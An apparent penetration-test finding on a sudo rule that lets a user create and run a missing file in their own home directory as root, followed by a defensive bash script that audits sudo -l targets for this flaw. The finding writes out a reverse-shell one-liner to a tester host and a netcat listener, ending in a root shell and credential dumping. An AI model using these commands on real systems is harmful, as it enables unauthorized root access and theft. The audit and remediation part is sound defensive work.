sudo with File Hijacking


It was identified that the dev-datasci user in the WSL environment on the DEV-DATASCI-JUP (10.10.232.68) host is permitted by sudo (as listed by sudo -l) to execute /home/dev-datasci/.local/bin/jupyter. The file does not exist, but its path lies inside the user's own home directory, so the user can create it with arbitrary contents and have sudo run that code with elevated privileges.

(base) dev-datasci@DEV-DATASCI-JUP:~$ echo 'bash -c "bash -i >& /dev/tcp/10.9.0.130/1234 0>&1"' > /home/dev-datasci/.local/bin/jupyter ; chmod 755 /home/dev-datasci/.local/bin/jupyter

Writing a reverse shell payload (connecting back to 10.9.0.130 on port 1234) into /home/dev-datasci/.local/bin/jupyter and making the file executable.

(base) dev-datasci@DEV-DATASCI-JUP:/$ sudo /home/dev-datasci/.local/bin/jupyter

Executing the sudo-permitted command. With a listener waiting on 10.9.0.130:1234 (for example nc -lvnp 1234), the callback arrives as a root shell.

System-level (root) compromise of the WSL environment on the DEV-DATASCI-JUP (10.10.232.68) host. Dumping credentials.
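As an added example that is not part of the original report, the script below generalises the check behind this finding: it parses sudo -l output for the command paths granted to the current user and flags any path the user can control, either because the file is missing and its nearest existing ancestor directory is writable (the jupyter case above) or because the file or its parent directory is writable. The sudo -l sample text and the temporary directory layout used in the demo are constructed; in a real audit the input would be the output of sudo -l.

```bash
#!/bin/bash
# Added example, not part of the original report: audit the targets that
# "sudo -l" grants to the current user and flag those that could be hijacked
# the way /home/dev-datasci/.local/bin/jupyter was (missing file under a
# user-writable directory, or an existing file/parent the user can write).
# The sample "sudo -l" text and the temp-dir layout in the demo are constructed.

# Print the command paths granted in "sudo -l" output read from stdin,
# one per line. Lines look like "    (ALL) NOPASSWD: /path/a, /path/b arg".
sudo_targets() {
    awk '/^[[:space:]]*\(/ {
        sub(/^[[:space:]]*\([^)]*\)[[:space:]]*/, "")        # drop "(runas : group)"
        gsub(/(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):[[:space:]]*/, "")
        n = split($0, cmds, /,[[:space:]]*/)
        for (i = 1; i <= n; i++) {
            split(cmds[i], w, /[[:space:]]+/)
            if (w[1] ~ /^\//) print w[1]                   # absolute paths only; "ALL" is skipped
        }
    }'
}

# Walk up from a path to its first existing ancestor (terminates at "/").
first_existing() {
    local p="$1"
    while [ ! -e "$p" ]; do p=$(dirname "$p"); done
    printf '%s\n' "$p"
}

# Return 0 and print the reason if the current user can control what runs
# when sudo executes $1; return 1 otherwise.
check_sudo_target() {
    local target="$1" anc
    if [ ! -e "$target" ]; then
        anc=$(first_existing "$target")
        if [ -w "$anc" ]; then
            echo "HIJACKABLE $target: missing, and $anc is writable (create it)"
            return 0
        fi
        echo "ok $target: missing, but $anc is not writable"
        return 1
    fi
    if [ -w "$target" ]; then
        echo "HIJACKABLE $target: exists and is writable (overwrite it)"
        return 0
    fi
    if [ -w "$(dirname "$target")" ]; then
        echo "HIJACKABLE $target: parent directory is writable (replace it)"
        return 0
    fi
    echo "ok $target: not writable by $(id -un)"
    return 1
}

# Run the check over every target found in "sudo -l" output read from stdin.
# Real use: sudo -l | audit_sudo_targets
audit_sudo_targets() {
    local t
    sudo_targets | while IFS= read -r t; do
        check_sudo_target "$t" || true
    done
}

# Stand-alone demo on a constructed layout mirroring the DEV-DATASCI-JUP
# finding: ~/.local exists and is writable, ~/.local/bin/jupyter does not.
demo=$(mktemp -d)
mkdir -p "$demo/home/dev-datasci/.local"
printf '%s\n' \
    "User dev-datasci may run the following commands on DEV-DATASCI-JUP:" \
    "    (ALL) NOPASSWD: $demo/home/dev-datasci/.local/bin/jupyter" \
    "    (root) /usr/bin/less --help, /usr/bin/vim" | audit_sudo_targets
rm -rf "$demo"
```

The same check is the remediation test: a sudoers target should exist, be owned by root, and sit in a directory chain the invoking user cannot write, so that check_sudo_target reports "ok" for every granted path.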